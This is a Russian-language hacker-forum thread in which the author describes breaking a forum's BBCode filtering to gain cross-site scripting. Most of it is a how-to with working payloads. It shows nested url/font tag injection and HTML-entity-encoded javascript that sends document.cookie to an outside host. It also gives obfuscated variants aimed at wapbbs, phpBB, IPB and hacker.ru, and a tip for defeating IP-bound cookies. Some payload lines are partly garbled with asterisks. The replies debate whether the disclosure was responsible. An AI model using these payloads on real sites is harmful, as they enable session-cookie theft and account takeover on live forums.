Начал Я изучать форум античата с Января этого года.

Бла бла под конец - Я его взломал.

Вот как Я его ломал.



Должен сказать сразу, что после того как Я нашёл багу на античате, Я сразу рассказал её четырём юзером античата.

Сначало Zadoxlik`у, потом моему лучшему другу на интернете xSpider`у и третьему человеку Я рассказал Jazzsummerman, который потом случайно рассказал Че Геваре который и прикрыл эту багу прежде тем, как Я ей сумел воспользовался. Без обид, что было то было.

Объяснять красивым языком как Алгол, Zadoxlik Jazzsummerman Я ещё не научился, так что расскажу как могу.




Первоначальная ошибка состоит в том, что теги http://www.antichat.ru

и

http://www.antichat.ru (http://www.antichat.ru)очень плохо отфильтрированны.


Перебрав десятки комбинаций и изучив все теги античатовского форума, Я решил засунуть один тег урл в другой тег урл.

Вот так:

http://www.wj.com]wj (http://www.wj.comwj </a></a>

Думаю тут всё и так ясно. Второй тег урл, зашёл в атрибут первого тега урл.

После этого, Я задал такой запрос античатовскому форуму:

http://www.wj.com]wj wj (http://www.wj.com


И вот что он мне выдал:

<a href="http://www.wj.com<a href=&quot;http://www.wj.com" target="_blank">wj <font face=&quot;Arial&quot;>wj</font>" target="_blank">http://www.wj.com]wj <font face="Arial">wj</font></a></a>[HTML]

Как уже заметно, из-за того, что теги урл фильтрируют все кавычки, nj второй тег урл отфильтрировал кавычки в теги фонт, после чего кавычки перестали существовать вообще, что Я и сам сразу не заметил. И естественно теперь одним пробелом, который как специально для нас разрешён (Тут можно прочитать подробнее о том, что становится когда кавычек нет и добавляется пробел http://www.antichat.ru/crackchat/index.html )
мы теперь можем вписывать произвольной код.


Долго не буду рассказывать, что пропускается в каждом теги античата, которые мне пришлось из-за нужды вызубрить наизусть, но просто скажу, что в теги фонт, не пропускается двоеточие. <:> Эта проблема меня заставила искать помощь у других Хакеров античата.

Естественно мне помог мой лучший друг по имени хSpider которые посоветовал мне использовать html объекты.

Должен сказать, что алёрт у меня был и без них, через такой код.

[HTML]http://www.wj.com]wj wj (http://www.wj.com[url)

Результат:

<a href="http://www.wj.com<a href=&quot;http://www.wj.com" target="_blank">wj <font face=&quot;Arial size=100 onmouseover=alert(/Hello_from_WJ/) /&quot;>wj</font>" target="_blank">http://www.wj.com]wj &lt;font face=&quot;Ar.../) /&quot;&gt;wj&lt;/font&gt;</a></a>

При проведении мышки на WJ, выскакивал алёрт.

Мне захотелось пойти дальше и xSpider мне помог заменить двоеточие ( ":" ) этим символом. &******#58;

Знаю, Я и сам удился. Сто раз про это читал и т.д. и только вспомнил, что он есть и им можно воспользовался. Ещё давно мне даже Железо показывал мылы тырить через эти символы, но почему то мне это не пришло в голову.

После этого, используя эту ссылку, http://www.h4cky0u.org/encrypt/index.php Я закодировал свой код? и вот что меня получилось....



http://www.]wj (wj[url)[HTML


Это воровало куки на ура.


Вот код для желающих как ломать веб-хак.

[HTML]` style=`background:url(javaSCrip t:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`

Можно ещё и так

wj@wj.com[URL=wj/style=background&*#58;url(javascript*:document.image*s *1;&#*49;].*src=*"*h*;*6;
*16;&*#112*;*8;&#*47;&#*47;&#*97;&#*110;*t*;
*05;&#*99;&*#104;*a**6;&#*46;&#*114;&*#117*;*7; *9;
*03;&*#105;*-*;b*; *5;
*10;&*#47;s.j&*#112;g?"+document.cookie); ] (wj`=`)


Для интересующихся как Я ломал форум wapbbs, вот вам один из кодов.

http://www.phpbb.com/значениеwjimages/phplogo.gif/style=background&*#58;url(*j*; *7;
*18;&*#97;&*#115*;c*;*4;
*05;&#*112;*t*;:*;
*00;&#*111;&*#99;&*#117;*m*;
*01;&#*110;&*#116*;.*; *5;
*09;&*#97;*g
*01;&*#115;*[*1*]*.src*=*4;&#*104;*t*;*6;
*12;&*#58;&*#47;*/*a*;*0;
*16;&*#105*;c*; *4;&#*97;&*#116;*.**4;
*17;&*#47;&*#99;&*#103;* *5;*5; *8;
*05;&*#110;*/*s*;.*; *6;&#*112;*g*;?*;"*;+
*00;&#*111;*c*;ument.cookie);

Вот второй

http://www.wj.comhttp://www.wapbbs.com/bbs//images/statusicon/forum_new.gif'=''

Код воровки кук скопируйте с первого примера.

Так как к кукам wapbbs привязывается ещё и ИП, то это можно обойти с помощью burp proxy.
http://www.portswigger.net/proxy/

Сейчас вышли новые форумы, например IPB 2.1.1 и он ломается вот так:

[/topic]]




Форум phpbb 2.0.17 ломается вот так: (Код надо будет если время и желание будет - доработать.)

http://www.phpbb.com/wjwj@wj.comimages/phplogo.gif phpbb 2.0.17



Структура форума хакер.ру, ломается вот так.

http://www.wj'='.gif'

А так же в самом заголовке и имени тем на этом форуме, разрешается вставка тегов, причём там очень плохая фильтрация. При специальных символах, этот форум ломается на ура как и в теле сообщения, так и в заголовке топиков.



Вот и всё.



White Jordan.

Ща попробую на других форумах статья так не чё.

Мне захотелось пойти дальше и xSpider мне помог заменить двоеточие ( ":" ) этим символом &******#58;



На сколько я понял вы действовали вместе ?

Зачем забанили такого хорошего автора ? %-)

На сколько я понял вы действовали вместе ?

21:40:17: скажи вандалу что нет
21:40:22: работал Я один
21:40:27: топик ответь
21:40:29: Я не могу пока
21:40:42: скажи Белый Джордан говорит что нет
21:40:45: он напомнил
21:40:50: как уже сказал в статье
21:40:53: работал сам
21:41:02: так что хСпайдера за это баннить не стоит
21:41:08: он тут не причём скажи
21:41:14: а то мали ли что
21:41:20: и впрямь бан ему влепят

кстати если кому интересно- то он нацелен на то что щас пол ачата ломанётся вапс ломать- люди не советую!!! поимите- не стоит идти на поводу и из за него портить всем жизнь!! запомните- НЕ ДЕЛАЙТЕ ЭТОГО!!! не будте марионетками к его руках!!! если хотите проверить- то проверяйте не на его примерах!

а че его примеры тебе не нравятся то?? Типо у остального ачата они лучше?!

а че его примеры тебе не нравятся то?? Типо у остального ачата они лучше?!
гыыыыыыыы.... я говорю не риньтесь с дуру веше=ать хакер и вапс- проверяйте для начала на однотипных сайтах)
в будующем советую немного сдержаннее реагировать на мои сообщения)
С Уважением Силверан)))

чет я не понял как с помощью этого - http://www.phpbb.com/wjwj@wj.comimages/phplogo.gif ломануть phpbb 2.0.17

Я так понимаю что для гринов угрозы никакой не было, т.к. надеюсь что все давно пересели на файрофкс или что-то в этом духе.

Тему еще не закрыли, и не удалили?)) Удивительно.

Отличная статья. С другой стороны автор приследовал явно не хорошие цели.
А вообще позновательно.

Норм статья... хоть wj мне не очень нравиться

А я думаю удаляйте ей быстрее а то весь инет разнесут!

Код воровки кук скопируйте с первого примера.

Так как к кукам wapbbs привязывается ещё и ИП, то это можно обойти с помощью burp proxy.
http://www.portswigger.net/proxy/

Угу..., но не надо было это рассказывать..., ех...

А так конечно молодец!. 5+ и безусловно +b =).

Я говорю закрываете быстрее то плохо всем сайтам будет!

SanyaX - ну понимаешь в чём дело =). По идеи можно вообще ни о чём не говорить, ни какие уязвимости не показывать, и вообще закрыть все порталы касающиеся безопасности в сети. Тогда всем сайтам будет хорошо?. =). Не думаю...

кстати интерено что за ажиотаж?
тот кто более или менее знаком с материалами античата, сам влегкую может такие же уязвимости найти. нового мало.
Вайт Джордан правда молодец, что на нашем пропатченном спеуиализированном форуме лазейку нашел




-------------
Алсу сосет

Вайт Джордан - молоток, что не поленился и кропотливо иследовал.
Если бы не твоя манера Якать и себя возвеличивать - цены бы тебе небыло. Имхо.

А вот что на счет phpBB... Ничего интересного не вижу пока :( Там проверка на скрипты и т.п.

хм.. всё, что я понял из этой статьи, так это то, что сломать можно всё. надеюсь, с вашей помощью, в скором будущем, я буду понимать намного больше. остаётся добавить лишь это: СВОБОДУ Rat!!!!!!!!!!!!!

Молодец Wj, :-*
Как сказали уже, если бы не твое "Я", не было бы тебе цены :)

Спасибо! Ipb 2.0.4 и 2.1.1 ломаются на ура

За статью несомненно респект и разбанить чела надо, но все таки вывешивать ее у всех на виду... надо было в каком-нить закрытом разделе (для проверенных пользователей) или еще как...
А то это все равно что научить каждого второго DoSом пользоваться - точно пол инета ляжет)

Abra Регистрация: 17.09.2005нихуя не знаете а еще че-та говорите.